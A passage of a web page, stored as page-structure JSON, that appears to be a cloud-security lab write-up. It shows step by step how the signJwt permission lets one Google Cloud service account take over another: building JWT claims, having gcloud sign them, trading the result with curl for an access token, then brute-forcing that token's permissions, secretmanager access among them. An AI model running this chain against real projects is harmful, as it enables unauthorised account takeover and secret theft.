",{"type":33,"tag":105,"props":2283,"children":2285},{"className":2284},[],[2286],{"type":38,"value":2287},"platform-middleware",{"type":38,"value":2289}," service account. We will see on the next chapiter how to abuse this privilege to elevate our privileges.",{"type":33,"tag":40,"props":2291,"children":2293},{"id":2292},"abusing-iamserviceaccountssignjwt",[2294],{"type":38,"value":2295},"Abusing iam.serviceAccounts.signJwt",{"type":33,"tag":47,"props":2297,"children":2298},{},[2299,2301,2310],{"type":38,"value":2300},"The permission ",{"type":33,"tag":2302,"props":2303,"children":2304},"strong",{},[2305],{"type":33,"tag":105,"props":2306,"children":2308},{"className":2307},[],[2309],{"type":38,"value":1361},{"type":38,"value":2311}," in Google Cloud allows a user or service to use a private key associated with a service account to sign a JSON Web Token (JWT).",{"type":33,"tag":47,"props":2313,"children":2314},{},[2315],{"type":38,"value":2316},"There are different use cases:",{"type":33,"tag":239,"props":2318,"children":2319},{},[2320,2330,2340],{"type":33,"tag":243,"props":2321,"children":2322},{},[2323,2328],{"type":33,"tag":2302,"props":2324,"children":2325},{},[2326],{"type":38,"value":2327},"Inter-service Authentication",{"type":38,"value":2329},": A service can generate a signed JWT to authenticate with other services.",{"type":33,"tag":243,"props":2331,"children":2332},{},[2333,2338],{"type":33,"tag":2302,"props":2334,"children":2335},{},[2336],{"type":38,"value":2337},"Temporary Access",{"type":38,"value":2339},": Generation of OAuth2 tokens based on a JWT to access Google APIs.",{"type":33,"tag":243,"props":2341,"children":2342},{},[2343,2348],{"type":33,"tag":2302,"props":2344,"children":2345},{},[2346],{"type":38,"value":2347},"OpenID Connect Authentication",{"type":38,"value":2349},": Used to prove the service account's identity to third-party 
services.",{"type":33,"tag":47,"props":2351,"children":2352},{},[2353,2355,2360],{"type":38,"value":2354},"What interests us is the second part - it is possible to create an OAuth2 token from a JWT to access the Google API, which will allow us to gain control over the ",{"type":33,"tag":105,"props":2356,"children":2358},{"className":2357},[],[2359],{"type":38,"value":2287},{"type":38,"value":2361}," service account.",{"type":33,"tag":47,"props":2363,"children":2364},{},[2365,2367,2373,2375],{"type":38,"value":2366},"Currently we are the freshly compromised service account thanks to implicit delegation: ",{"type":33,"tag":105,"props":2368,"children":2370},{"className":2369},[],[2371],{"type":38,"value":2372},"analytics@gr-proj-4.iam.gserviceaccount.com",{"type":38,"value":2374},", and our target will be the service account ",{"type":33,"tag":105,"props":2376,"children":2378},{"className":2377},[],[2379],{"type":38,"value":2380},"platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":33,"tag":47,"props":2382,"children":2383},{},[2384],{"type":38,"value":2385},"First, we need to create our data part of our JWT like this:",{"type":33,"tag":114,"props":2387,"children":2388},{"lang":116},[2389],{"type":33,"tag":119,"props":2390,"children":2392},{"className":121,"code":2391,"language":116,"meta":8,"style":8},"export IAT=$(date +%s)\nexport EXP=$(($IAT + 3600))\ncat > claims.json \u003C\u003CEOF\n{\n\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n\"aud\": \"https://oauth2.googleapis.com/token\",\n\"exp\": $EXP,\n\"iat\": 
$IAT\n}\nEOF\n",[2393],{"type":33,"tag":105,"props":2394,"children":2395},{"__ignoreMap":8},[2396,2428,2460,2488,2495,2503,2511,2519,2527,2535,2542],{"type":33,"tag":128,"props":2397,"children":2398},{"class":130,"line":131},[2399,2403,2408,2413,2418,2423],{"type":33,"tag":128,"props":2400,"children":2401},{"style":300},[2402],{"type":38,"value":303},{"type":33,"tag":128,"props":2404,"children":2405},{"style":306},[2406],{"type":38,"value":2407}," IAT",{"type":33,"tag":128,"props":2409,"children":2410},{"style":312},[2411],{"type":38,"value":2412},"=$(",{"type":33,"tag":128,"props":2414,"children":2415},{"style":135},[2416],{"type":38,"value":2417},"date",{"type":33,"tag":128,"props":2419,"children":2420},{"style":140},[2421],{"type":38,"value":2422}," +%s",{"type":33,"tag":128,"props":2424,"children":2425},{"style":312},[2426],{"type":38,"value":2427},")\n",{"type":33,"tag":128,"props":2429,"children":2430},{"class":130,"line":362},[2431,2435,2440,2445,2450,2455],{"type":33,"tag":128,"props":2432,"children":2433},{"style":300},[2434],{"type":38,"value":303},{"type":33,"tag":128,"props":2436,"children":2437},{"style":306},[2438],{"type":38,"value":2439}," EXP",{"type":33,"tag":128,"props":2441,"children":2442},{"style":312},[2443],{"type":38,"value":2444},"=$((",{"type":33,"tag":128,"props":2446,"children":2447},{"style":306},[2448],{"type":38,"value":2449},"$IAT",{"type":33,"tag":128,"props":2451,"children":2452},{"style":323},[2453],{"type":38,"value":2454}," + 3600",{"type":33,"tag":128,"props":2456,"children":2457},{"style":312},[2458],{"type":38,"value":2459},"))\n",{"type":33,"tag":128,"props":2461,"children":2462},{"class":130,"line":403},[2463,2468,2473,2478,2483],{"type":33,"tag":128,"props":2464,"children":2465},{"style":135},[2466],{"type":38,"value":2467},"cat",{"type":33,"tag":128,"props":2469,"children":2470},{"style":300},[2471],{"type":38,"value":2472}," 
>",{"type":33,"tag":128,"props":2474,"children":2475},{"style":140},[2476],{"type":38,"value":2477}," claims.json",{"type":33,"tag":128,"props":2479,"children":2480},{"style":300},[2481],{"type":38,"value":2482}," \u003C\u003C",{"type":33,"tag":128,"props":2484,"children":2485},{"style":676},[2486],{"type":38,"value":2487},"EOF\n",{"type":33,"tag":128,"props":2489,"children":2490},{"class":130,"line":739},[2491],{"type":33,"tag":128,"props":2492,"children":2493},{"style":140},[2494],{"type":38,"value":650},{"type":33,"tag":128,"props":2496,"children":2497},{"class":130,"line":765},[2498],{"type":33,"tag":128,"props":2499,"children":2500},{"style":140},[2501],{"type":38,"value":2502},"\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n",{"type":33,"tag":128,"props":2504,"children":2505},{"class":130,"line":804},[2506],{"type":33,"tag":128,"props":2507,"children":2508},{"style":140},[2509],{"type":38,"value":2510},"\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n",{"type":33,"tag":128,"props":2512,"children":2513},{"class":130,"line":839},[2514],{"type":33,"tag":128,"props":2515,"children":2516},{"style":140},[2517],{"type":38,"value":2518},"\"aud\": \"https://oauth2.googleapis.com/token\",\n",{"type":33,"tag":128,"props":2520,"children":2521},{"class":130,"line":848},[2522],{"type":33,"tag":128,"props":2523,"children":2524},{"style":140},[2525],{"type":38,"value":2526},"\"exp\": $EXP,\n",{"type":33,"tag":128,"props":2528,"children":2529},{"class":130,"line":976},[2530],{"type":33,"tag":128,"props":2531,"children":2532},{"style":140},[2533],{"type":38,"value":2534},"\"iat\": 
$IAT\n",{"type":33,"tag":128,"props":2536,"children":2537},{"class":130,"line":988},[2538],{"type":33,"tag":128,"props":2539,"children":2540},{"style":140},[2541],{"type":38,"value":854},{"type":33,"tag":128,"props":2543,"children":2544},{"class":130,"line":1001},[2545],{"type":33,"tag":128,"props":2546,"children":2547},{"style":676},[2548],{"type":38,"value":2487},{"type":33,"tag":47,"props":2550,"children":2551},{},[2552],{"type":38,"value":2553},"Here are the details of the JWT payload section:",{"type":33,"tag":239,"props":2555,"children":2556},{},[2557,2585,2610,2642,2656],{"type":33,"tag":243,"props":2558,"children":2559},{},[2560,2569,2571,2577],{"type":33,"tag":2302,"props":2561,"children":2562},{},[2563],{"type":33,"tag":105,"props":2564,"children":2566},{"className":2565},[],[2567],{"type":38,"value":2568},"iss",{"type":38,"value":2570}," – ",{"type":33,"tag":2572,"props":2573,"children":2574},"em",{},[2575],{"type":38,"value":2576},"Issuer",{"type":33,"tag":239,"props":2578,"children":2579},{},[2580],{"type":33,"tag":243,"props":2581,"children":2582},{},[2583],{"type":38,"value":2584},"The service account email address. 
This indicates who generated the JWT",{"type":33,"tag":243,"props":2586,"children":2587},{},[2588,2596,2597,2602],{"type":33,"tag":2302,"props":2589,"children":2590},{},[2591],{"type":33,"tag":105,"props":2592,"children":2594},{"className":2593},[],[2595],{"type":38,"value":1974},{"type":38,"value":2570},{"type":33,"tag":2572,"props":2598,"children":2599},{},[2600],{"type":38,"value":2601},"Access Scope",{"type":33,"tag":239,"props":2603,"children":2604},{},[2605],{"type":33,"tag":243,"props":2606,"children":2607},{},[2608],{"type":38,"value":2609},"One or more URLs indicating the requested permissions, used to specify which services or APIs in Google Cloud we want to use",{"type":33,"tag":243,"props":2611,"children":2612},{},[2613,2622,2623,2628],{"type":33,"tag":2302,"props":2614,"children":2615},{},[2616],{"type":33,"tag":105,"props":2617,"children":2619},{"className":2618},[],[2620],{"type":38,"value":2621},"aud",{"type":38,"value":2570},{"type":33,"tag":2572,"props":2624,"children":2625},{},[2626],{"type":38,"value":2627},"Audience",{"type":33,"tag":239,"props":2629,"children":2630},{},[2631],{"type":33,"tag":243,"props":2632,"children":2633},{},[2634,2636],{"type":38,"value":2635},"Google's OAuth2 endpoint URL, which specifies the intended recipient service of the JWT, in this case Google OAuth to obtain an ",{"type":33,"tag":105,"props":2637,"children":2639},{"className":2638},[],[2640],{"type":38,"value":2641},"access_token",{"type":33,"tag":243,"props":2643,"children":2644},{},[2645,2654],{"type":33,"tag":2302,"props":2646,"children":2647},{},[2648],{"type":33,"tag":105,"props":2649,"children":2651},{"className":2650},[],[2652],{"type":38,"value":2653},"exp",{"type":38,"value":2655}," – Expiration 
Time",{"type":33,"tag":243,"props":2657,"children":2658},{},[2659,2668],{"type":33,"tag":2302,"props":2660,"children":2661},{},[2662],{"type":33,"tag":105,"props":2663,"children":2665},{"className":2664},[],[2666],{"type":38,"value":2667},"iat",{"type":38,"value":2669}," – Issued At Time",{"type":33,"tag":47,"props":2671,"children":2672},{},[2673],{"type":38,"value":2674},"Then we will sign our JWT using the target service account:",{"type":33,"tag":114,"props":2676,"children":2677},{"lang":116},[2678],{"type":33,"tag":119,"props":2679,"children":2681},{"className":121,"code":2680,"language":116,"meta":8,"style":8},"gcloud iam service-accounts sign-jwt claims.json signed-jwt.txt \\\n  --iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",[2682],{"type":33,"tag":105,"props":2683,"children":2684},{"__ignoreMap":8},[2685,2721],{"type":33,"tag":128,"props":2686,"children":2687},{"class":130,"line":131},[2688,2692,2697,2702,2707,2711,2716],{"type":33,"tag":128,"props":2689,"children":2690},{"style":135},[2691],{"type":38,"value":110},{"type":33,"tag":128,"props":2693,"children":2694},{"style":140},[2695],{"type":38,"value":2696}," iam",{"type":33,"tag":128,"props":2698,"children":2699},{"style":140},[2700],{"type":38,"value":2701}," service-accounts",{"type":33,"tag":128,"props":2703,"children":2704},{"style":140},[2705],{"type":38,"value":2706}," sign-jwt",{"type":33,"tag":128,"props":2708,"children":2709},{"style":140},[2710],{"type":38,"value":2477},{"type":33,"tag":128,"props":2712,"children":2713},{"style":140},[2714],{"type":38,"value":2715}," signed-jwt.txt",{"type":33,"tag":128,"props":2717,"children":2718},{"style":151},[2719],{"type":38,"value":2720}," \\\n",{"type":33,"tag":128,"props":2722,"children":2723},{"class":130,"line":362},[2724],{"type":33,"tag":128,"props":2725,"children":2726},{"style":151},[2727],{"type":38,"value":2728},"  
--iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":47,"props":2730,"children":2731},{},[2732,2734,2739,2741,2746,2748,2753],{"type":38,"value":2733},"This command is launched from a service account ",{"type":33,"tag":105,"props":2735,"children":2737},{"className":2736},[],[2738],{"type":38,"value":2254},{"type":38,"value":2740},", which has been authorized via IAM to perform the action ",{"type":33,"tag":105,"props":2742,"children":2744},{"className":2743},[],[2745],{"type":38,"value":1361},{"type":38,"value":2747}," on the service account ",{"type":33,"tag":105,"props":2749,"children":2751},{"className":2750},[],[2752],{"type":38,"value":2287},{"type":38,"value":215},{"type":33,"tag":47,"props":2755,"children":2756},{},[2757],{"type":38,"value":2758},"This means that:",{"type":33,"tag":239,"props":2760,"children":2761},{},[2762,2780],{"type":33,"tag":243,"props":2763,"children":2764},{},[2765,2767,2772,2774,2779],{"type":38,"value":2766},"The ",{"type":33,"tag":105,"props":2768,"children":2770},{"className":2769},[],[2771],{"type":38,"value":2254},{"type":38,"value":2773}," account does not have the private key of ",{"type":33,"tag":105,"props":2775,"children":2777},{"className":2776},[],[2778],{"type":38,"value":2287},{"type":38,"value":215},{"type":33,"tag":243,"props":2781,"children":2782},{},[2783,2785,2790],{"type":38,"value":2784},"But it has the right to ask Google IAM to sign a JWT on its behalf, as if ",{"type":33,"tag":105,"props":2786,"children":2788},{"className":2787},[],[2789],{"type":38,"value":2287},{"type":38,"value":2791}," was doing it.",{"type":33,"tag":47,"props":2793,"children":2794},{},[2795],{"type":38,"value":2796},"To explain the command parameters in more 
detail:",{"type":33,"tag":239,"props":2798,"children":2799},{},[2800,2818,2835],{"type":33,"tag":243,"props":2801,"children":2802},{},[2803,2809,2811,2816],{"type":33,"tag":105,"props":2804,"children":2806},{"className":2805},[],[2807],{"type":38,"value":2808},"claims.json",{"type":38,"value":2810},"→ Input file containing the ",{"type":33,"tag":2302,"props":2812,"children":2813},{},[2814],{"type":38,"value":2815},"data",{"type":38,"value":2817}," of the JWT to be signed (JSON format).",{"type":33,"tag":243,"props":2819,"children":2820},{},[2821,2827,2829,2834],{"type":33,"tag":105,"props":2822,"children":2824},{"className":2823},[],[2825],{"type":38,"value":2826},"signed-jwt.txt",{"type":38,"value":2828},"→ Output file that will contain the ",{"type":33,"tag":2302,"props":2830,"children":2831},{},[2832],{"type":38,"value":2833},"signed JWT",{"type":38,"value":215},{"type":33,"tag":243,"props":2836,"children":2837},{},[2838,2844,2846,2851,2853,2858],{"type":33,"tag":105,"props":2839,"children":2841},{"className":2840},[],[2842],{"type":38,"value":2843},"--iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":38,"value":2845},"→ Indicates that ",{"type":33,"tag":2302,"props":2847,"children":2848},{},[2849],{"type":38,"value":2850},"this service account",{"type":38,"value":2852}," (",{"type":33,"tag":105,"props":2854,"children":2856},{"className":2855},[],[2857],{"type":38,"value":2287},{"type":38,"value":2859},") should sign the JWT.",{"type":33,"tag":47,"props":2861,"children":2862},{},[2863],{"type":38,"value":2864},"Then we will be able to use this JWT to claim an access token that will allow us to gain access to the target service account.",{"type":33,"tag":114,"props":2866,"children":2867},{"lang":116},[2868],{"type":33,"tag":119,"props":2869,"children":2871},{"className":121,"code":2870,"language":116,"meta":8,"style":8},"curl -s -X POST https://oauth2.googleapis.com/token \\\n-H \"Content-Type: application/x-www-form-urlencoded\" \\\n-d 
\"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=$(cat signed-jwt.txt)\" \\\n| jq -r .access_token\nya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[2872],{"type":33,"tag":105,"props":2873,"children":2874},{"__ignoreMap":8},[2875,2907,2932,2975,2998],{"type":33,"tag":128,"props":2876,"children":2877},{"class":130,"line":131},[2878,2883,2888,2893,2898,2903],{"type":33,"tag":128,"props":2879,"children":2880},{"style":135},[2881],{"type":38,"value":2882},"curl",{"type":33,"tag":128,"props":2884,"children":2885},{"style":151},[2886],{"type":38,"value":2887}," -s",{"type":33,"tag":128,"props":2889,"children":2890},{"style":151},[2891],{"type":38,"value":2892}," -X",{"type":33,"tag":128,"props":2894,"children":2895},{"style":140},[2896],{"type":38,"value":2897}," POST",{"type":33,"tag":128,"props":2899,"children":2900},{"style":140},[2901],{"type":38,"value":2902}," https://oauth2.googleapis.com/token",{"type":33,"tag":128,"props":2904,"children":2905},{"style":151},[2906],{"type":38,"value":2720},{"type":33,"tag":128,"props":2908,"children":2909},{"class":130,"line":362},[2910,2915,2919,2924,2928],{"type":33,"tag":128,"props":2911,"children":2912},{"style":323},[2913],{"type":38,"value":2914},"-H ",{"type":33,"tag":128,"props":2916,"children":2917},{"style":676},[2918],{"type":38,"value":669},{"type":33,"tag":128,"props":2920,"children":2921},{"style":140},[2922],{"type":38,"value":2923},"Content-Type: application/x-www-form-urlencoded",{"type":33,"tag":128,"props":2925,"children":2926},{"style":676},[2927],{"type":38,"value":669},{"type":33,"tag":128,"props":2929,"children":2930},{"style":151},[2931],{"type":38,"value":2720},{"type":33,"tag":128,"props":2933,"children":2934},{"class":130,"line":403},[2935,2940,2944,2949,2954,2958,2962,2967,2971],{"type":33,"tag":128,"props":2936,"children":2937},{"style":323},[2938],{"type":38,"value":2939},"-d 
",{"type":33,"tag":128,"props":2941,"children":2942},{"style":676},[2943],{"type":38,"value":669},{"type":33,"tag":128,"props":2945,"children":2946},{"style":140},[2947],{"type":38,"value":2948},"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=",{"type":33,"tag":128,"props":2950,"children":2951},{"style":312},[2952],{"type":38,"value":2953},"$(",{"type":33,"tag":128,"props":2955,"children":2956},{"style":135},[2957],{"type":38,"value":2467},{"type":33,"tag":128,"props":2959,"children":2960},{"style":140},[2961],{"type":38,"value":2715},{"type":33,"tag":128,"props":2963,"children":2964},{"style":312},[2965],{"type":38,"value":2966},")",{"type":33,"tag":128,"props":2968,"children":2969},{"style":676},[2970],{"type":38,"value":669},{"type":33,"tag":128,"props":2972,"children":2973},{"style":151},[2974],{"type":38,"value":2720},{"type":33,"tag":128,"props":2976,"children":2977},{"class":130,"line":739},[2978,2983,2988,2993],{"type":33,"tag":128,"props":2979,"children":2980},{"style":300},[2981],{"type":38,"value":2982},"|",{"type":33,"tag":128,"props":2984,"children":2985},{"style":135},[2986],{"type":38,"value":2987}," jq",{"type":33,"tag":128,"props":2989,"children":2990},{"style":151},[2991],{"type":38,"value":2992}," -r",{"type":33,"tag":128,"props":2994,"children":2995},{"style":140},[2996],{"type":38,"value":2997}," .access_token\n",{"type":33,"tag":128,"props":2999,"children":3000},{"class":130,"line":765},[3001],{"type":33,"tag":128,"props":3002,"children":3003},{"style":135},[3004],{"type":38,"value":3005},"ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",{"type":33,"tag":47,"props":3007,"children":3008},{},[3009,3011,3016],{"type":38,"value":3010},"We can use the retrieved access token and begin enumerating the newly compromised service account (",{"type":33,"tag":105,"props":3012,"children":3014},{"className":3013},[],[3015],{"type":38,"value":2380},{"type":38,"value":3017},") with 
cliam:",{"type":33,"tag":114,"props":3019,"children":3020},{"lang":116},[3021],{"type":33,"tag":119,"props":3022,"children":3024},{"className":121,"code":3023,"language":116,"meta":8,"style":8},"cliam gcp --access-token=\"$CLOUDSDK_AUTH_ACCESS_TOKEN\"  --project-id gr-proj-4 bruteforce\nApr 04 00:38:49 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:38:54 INF ● compute.acceleratorTypes=get\nApr 04 00:38:54 INF ● compute.acceleratorTypes=list\nApr 04 00:38:54 INF ● compute.addresses=get\nApr 04 00:38:54 INF ● compute.addresses=list\nApr 04 00:38:54 INF ● compute.autoscalers=get\n[...SNIP...]\nApr 04 00:38:54 INF ● compute.zoneOperations=get\nApr 04 00:38:54 INF ● compute.zoneOperations=get-iam-policy\nApr 04 00:38:54 INF ● compute.zoneOperations=list\nApr 04 00:38:54 INF ● compute.zones=get\nApr 04 00:38:54 INF ● compute.zones=list\nApr 04 00:38:56 INF ● resourcemanager.projects=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get-iam-policy\nApr 04 00:38:56 INF ● secretmanager.secrets=list\nApr 04 00:38:57 INF ● run.routes=invoke\nApr 04 00:38:57 INF ● serviceusage.quotas=get\nApr 04 00:38:57 INF ● serviceusage.services=get\nApr 04 00:38:57 INF ● serviceusage.services=list\n",[3025],{"type":33,"tag":105,"props":3026,"children":3027},{"__ignoreMap":8},[3028,3070,3106,3135,3163,3191,3219,3247,3263,3291,3319,3347,3375,3403,3432,3460,3488,3516,3545,3573,3601],{"type":33,"tag":128,"props":3029,"children":3030},{"class":130,"line":131},[3031,3035,3039,3044,3048,3053,3057,3062,3066],{"type":33,"tag":128,"props":3032,"children":3033},{"style":135},[3034],{"type":38,"value":468},{"type":33,"tag":128,"props":3036,"children":3037},{"style":140},[3038],{"type":38,"value":492},{"type":33,"tag":128,"props":3040,"children":3041},{"style":151},[3042],{"type":38,"value":3043}," 
--access-token=",{"type":33,"tag":128,"props":3045,"children":3046},{"style":676},[3047],{"type":38,"value":669},{"type":33,"tag":128,"props":3049,"children":3050},{"style":140},[3051],{"type":38,"value":3052},"$CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":33,"tag":128,"props":3054,"children":3055},{"style":676},[3056],{"type":38,"value":669},{"type":33,"tag":128,"props":3058,"children":3059},{"style":151},[3060],{"type":38,"value":3061},"  --project-id",{"type":33,"tag":128,"props":3063,"children":3064},{"style":140},[3065],{"type":38,"value":507},{"type":33,"tag":128,"props":3067,"children":3068},{"style":140},[3069],{"type":38,"value":512},{"type":33,"tag":128,"props":3071,"children":3072},{"class":130,"line":362},[3073,3077,3081,3086,3090,3094,3098,3102],{"type":33,"tag":128,"props":3074,"children":3075},{"style":135},[3076],{"type":38,"value":520},{"type":33,"tag":128,"props":3078,"children":3079},{"style":523},[3080],{"type":38,"value":526},{"type":33,"tag":128,"props":3082,"children":3083},{"style":140},[3084],{"type":38,"value":3085}," 00:38:49",{"type":33,"tag":128,"props":3087,"children":3088},{"style":140},[3089],{"type":38,"value":536},{"type":33,"tag":128,"props":3091,"children":3092},{"style":140},[3093],{"type":38,"value":541},{"type":33,"tag":128,"props":3095,"children":3096},{"style":140},[3097],{"type":38,"value":546},{"type":33,"tag":128,"props":3099,"children":3100},{"style":140},[3101],{"type":38,"value":551},{"type":33,"tag":128,"props":3103,"children":3104},{"style":140},[3105],{"type":38,"value":556},{"type":33,"tag":128,"props":3107,"children":3108},{"class":130,"line":403},[3109,3113,3117,3122,3126,3130],{"type":33,"tag":128,"props":3110,"children":3111},{"style":135},[3112],{"type":38,"value":520},{"type":33,"tag":128,"props":3114,"children":3115},{"style":523},[3116],{"type":38,"value":526},{"type":33,"tag":128,"props":3118,"children":3119},{"style":140},[3120],{"type":38,"value":3121}," 
00:38:54",{"type":33,"tag":128,"props":3123,"children":3124},{"style":140},[3125],{"type":38,"value":577},{"type":33,"tag":128,"props":3127,"children":3128},{"style":140},[3129],{"type":38,"value":541},{"type":33,"tag":128,"props":3131,"children":3132},{"style":140},[3133],{"type":38,"value":3134}," compute.acceleratorTypes=get\n",{"type":33,"tag":128,"props":3136,"children":3137},{"class":130,"line":739},[3138,3142,3146,3150,3154,3158],{"type":33,"tag":128,"props":3139,"children":3140},{"style":135},[3141],{"type":38,"value":520},{"type":33,"tag":128,"props":3143,"children":3144},{"style":523},[3145],{"type":38,"value":526},{"type":33,"tag":128,"props":3147,"children":3148},{"style":140},[3149],{"type":38,"value":3121},{"type":33,"tag":128,"props":3151,"children":3152},{"style":140},[3153],{"type":38,"value":577},{"type":33,"tag":128,"props":3155,"children":3156},{"style":140},[3157],{"type":38,"value":541},{"type":33,"tag":128,"props":3159,"children":3160},{"style":140},[3161],{"type":38,"value":3162}," compute.acceleratorTypes=list\n",{"type":33,"tag":128,"props":3164,"children":3165},{"class":130,"line":765},[3166,3170,3174,3178,3182,3186],{"type":33,"tag":128,"props":3167,"children":3168},{"style":135},[3169],{"type":38,"value":520},{"type":33,"tag":128,"props":3171,"children":3172},{"style":523},[3173],{"type":38,"value":526},{"type":33,"tag":128,"props":3175,"children":3176},{"style":140},[3177],{"type":38,"value":3121},{"type":33,"tag":128,"props":3179,"children":3180},{"style":140},[3181],{"type":38,"value":577},{"type":33,"tag":128,"props":3183,"children":3184},{"style":140},[3185],{"type":38,"value":541},{"type":33,"tag":128,"props":3187,"children":3188},{"style":140},[3189],{"type":38,"value":3190}," 
compute.addresses=get\n",{"type":33,"tag":128,"props":3192,"children":3193},{"class":130,"line":804},[3194,3198,3202,3206,3210,3214],{"type":33,"tag":128,"props":3195,"children":3196},{"style":135},[3197],{"type":38,"value":520},{"type":33,"tag":128,"props":3199,"children":3200},{"style":523},[3201],{"type":38,"value":526},{"type":33,"tag":128,"props":3203,"children":3204},{"style":140},[3205],{"type":38,"value":3121},{"type":33,"tag":128,"props":3207,"children":3208},{"style":140},[3209],{"type":38,"value":577},{"type":33,"tag":128,"props":3211,"children":3212},{"style":140},[3213],{"type":38,"value":541},{"type":33,"tag":128,"props":3215,"children":3216},{"style":140},[3217],{"type":38,"value":3218}," compute.addresses=list\n",{"type":33,"tag":128,"props":3220,"children":3221},{"class":130,"line":839},[3222,3226,3230,3234,3238,3242],{"type":33,"tag":128,"props":3223,"children":3224},{"style":135},[3225],{"type":38,"value":520},{"type":33,"tag":128,"props":3227,"children":3228},{"style":523},[3229],{"type":38,"value":526},{"type":33,"tag":128,"props":3231,"children":3232},{"style":140},[3233],{"type":38,"value":3121},{"type":33,"tag":128,"props":3235,"children":3236},{"style":140},[3237],{"type":38,"value":577},{"type":33,"tag":128,"props":3239,"children":3240},{"style":140},[3241],{"type":38,"value":541},{"type":33,"tag":128,"props":3243,"children":3244},{"style":140},[3245],{"type":38,"value":3246}," 
compute.autoscalers=get\n",{"type":33,"tag":128,"props":3248,"children":3249},{"class":130,"line":848},[3250,3254,3258],{"type":33,"tag":128,"props":3251,"children":3252},{"style":312},[3253],{"type":38,"value":344},{"type":33,"tag":128,"props":3255,"children":3256},{"style":323},[3257],{"type":38,"value":349},{"type":33,"tag":128,"props":3259,"children":3260},{"style":312},[3261],{"type":38,"value":3262},"]\n",{"type":33,"tag":128,"props":3264,"children":3265},{"class":130,"line":976},[3266,3270,3274,3278,3282,3286],{"type":33,"tag":128,"props":3267,"children":3268},{"style":135},[3269],{"type":38,"value":520},{"type":33,"tag":128,"props":3271,"children":3272},{"style":523},[3273],{"type":38,"value":526},{"type":33,"tag":128,"props":3275,"children":3276},{"style":140},[3277],{"type":38,"value":3121},{"type":33,"tag":128,"props":3279,"children":3280},{"style":140},[3281],{"type":38,"value":577},{"type":33,"tag":128,"props":3283,"children":3284},{"style":140},[3285],{"type":38,"value":541},{"type":33,"tag":128,"props":3287,"children":3288},{"style":140},[3289],{"type":38,"value":3290}," compute.zoneOperations=get\n",{"type":33,"tag":128,"props":3292,"children":3293},{"class":130,"line":988},[3294,3298,3302,3306,3310,3314],{"type":33,"tag":128,"props":3295,"children":3296},{"style":135},[3297],{"type":38,"value":520},{"type":33,"tag":128,"props":3299,"children":3300},{"style":523},[3301],{"type":38,"value":526},{"type":33,"tag":128,"props":3303,"children":3304},{"style":140},[3305],{"type":38,"value":3121},{"type":33,"tag":128,"props":3307,"children":3308},{"style":140},[3309],{"type":38,"value":577},{"type":33,"tag":128,"props":3311,"children":3312},{"style":140},[3313],{"type":38,"value":541},{"type":33,"tag":128,"props":3315,"children":3316},{"style":140},[3317],{"type":38,"value":3318}," 
compute.zoneOperations=get-iam-policy\n",{"type":33,"tag":128,"props":3320,"children":3321},{"class":130,"line":1001},[3322,3326,3330,3334,3338,3342],{"type":33,"tag":128,"props":3323,"children":3324},{"style":135},[3325],{"type":38,"value":520},{"type":33,"tag":128,"props":3327,"children":3328},{"style":523},[3329],{"type":38,"value":526},{"type":33,"tag":128,"props":3331,"children":3332},{"style":140},[3333],{"type":38,"value":3121},{"type":33,"tag":128,"props":3335,"children":3336},{"style":140},[3337],{"type":38,"value":577},{"type":33,"tag":128,"props":3339,"children":3340},{"style":140},[3341],{"type":38,"value":541},{"type":33,"tag":128,"props":3343,"children":3344},{"style":140},[3345],{"type":38,"value":3346}," compute.zoneOperations=list\n",{"type":33,"tag":128,"props":3348,"children":3349},{"class":130,"line":1014},[3350,3354,3358,3362,3366,3370],{"type":33,"tag":128,"props":3351,"children":3352},{"style":135},[3353],{"type":38,"value":520},{"type":33,"tag":128,"props":3355,"children":3356},{"style":523},[3357],{"type":38,"value":526},{"type":33,"tag":128,"props":3359,"children":3360},{"style":140},[3361],{"type":38,"value":3121},{"type":33,"tag":128,"props":3363,"children":3364},{"style":140},[3365],{"type":38,"value":577},{"type":33,"tag":128,"props":3367,"children":3368},{"style":140},[3369],{"type":38,"value":541},{"type":33,"tag":128,"props":3371,"children":3372},{"style":140},[3373],{"type":38,"value":3374}," 
compute.zones=get\n",{"type":33,"tag":128,"props":3376,"children":3377},{"class":130,"line":1026},[3378,3382,3386,3390,3394,3398],{"type":33,"tag":128,"props":3379,"children":3380},{"style":135},[3381],{"type":38,"value":520},{"type":33,"tag":128,"props":3383,"children":3384},{"style":523},[3385],{"type":38,"value":526},{"type":33,"tag":128,"props":3387,"children":3388},{"style":140},[3389],{"type":38,"value":3121},{"type":33,"tag":128,"props":3391,"children":3392},{"style":140},[3393],{"type":38,"value":577},{"type":33,"tag":128,"props":3395,"children":3396},{"style":140},[3397],{"type":38,"value":541},{"type":33,"tag":128,"props":3399,"children":3400},{"style":140},[3401],{"type":38,"value":3402}," compute.zones=list\n",{"type":33,"tag":128,"props":3404,"children":3405},{"class":130,"line":1038},[3406,3410,3414,3419,3423,3427],{"type":33,"tag":128,"props":3407,"children":3408},{"style":135},[3409],{"type":38,"value":520},{"type":33,"tag":128,"props":3411,"children":3412},{"style":523},[3413],{"type":38,"value":526},{"type":33,"tag":128,"props":3415,"children":3416},{"style":140},[3417],{"type":38,"value":3418}," 00:38:56",{"type":33,"tag":128,"props":3420,"children":3421},{"style":140},[3422],{"type":38,"value":577},{"type":33,"tag":128,"props":3424,"children":3425},{"style":140},[3426],{"type":38,"value":541},{"type":33,"tag":128,"props":3428,"children":3429},{"style":140},[3430],{"type":38,"value":3431}," 
